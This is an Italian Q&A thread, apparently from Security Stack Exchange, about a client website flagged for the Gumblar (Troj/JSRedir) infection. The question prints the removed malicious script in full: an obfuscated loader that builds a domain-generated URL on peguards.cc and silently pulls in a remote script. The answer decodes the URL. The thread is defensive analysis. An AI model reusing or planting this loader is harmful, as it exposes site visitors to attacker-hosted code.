JavaScript dannoso - Troj / JSRedir - Gumblar

1

Ho un cliente con un sito Web che riceve avvisi AV da Microsoft Security Essentials. Un'ulteriore indagine ha rivelato che il sito è stato inserito nella blacklist da Yandex.com, a causa di un rapporto secondo cui il sito contiene javascript dannosi. In particolare: Troj / JSRedir-HP (Gumblar)

Ho rimosso questo codice dal suo sito poiché si trovava nella pagina che stava ricevendo gli avvertimenti. A questo punto, non sappiamo se si tratta di un'iniezione esterna, o forse di un codice legittimo che il suo sviluppatore web potrebbe aver inserito.

Qualche idea su cosa potrebbe comportare?

<script type="text/javascript" language="javascript">
document.write('<' + 'script type="text/javascript" language="javascript" id="aoc262540n"></' + 'script>');
var j = document.getElementById("aoc262540n");
var s = document.location.host;
var s1 = "";
var qcl2q = 10;
for (var i = 0; i < s.length; i++) {
    var r8j8tnwtk76gj = s.charCodeAt(i) + qcl2q;
    r8j8tnwtk76gj = 65 + (r8j8tnwtk76gj % 57);
    s1 += String.fromCharCode(r8j8tnwtk76gj);
    qcl2q = s.charCodeAt(i);
}
s1 = s1.replace(/[^a-zA-Z0-9]/g, "");
if (document.cookie.indexOf("google_api=1;") == -1) {
    j.src = "\x68\x74t\x70\x3a\x2f\x2f" + s1 + ".\x70\x65\x67\x75\x61r\x64\x73.cc\x2f\x38\x39d\x38\x31\x6207iq\x2f\x67\x65\x74.\x6a\x73";
}
delete s;
delete s1;
</script>
    
posta suhdo 17.10.2014 - 20:21
fonte

1 risposta

2
j.src = "\x68\x74t\x70\x3a\x2f\x2f" + s1 + ".\x70\x65\x67\x75\x61r\x64\x73.cc\x2f\x38\x39d\x38\x31\x6207iq\x2f\x67\x65\x74.\x6a\x73";

La riga sopra sta cercando di creare un URL.

Per http://security.stackexchange.com/ crea

http://LnnDqsJvpDkZdfsqaekbbhr.peguards.cc/89d81b07iq/get.js

Quindi scrive questo URL sul sito Web per reindirizzare gli utenti all'URL se l'utente fa clic su di esso. Il sito Web sembra un sito Web di malware.

    
risposta data 17.10.2014 - 20:39
fonte

Leggi altre domande sui tag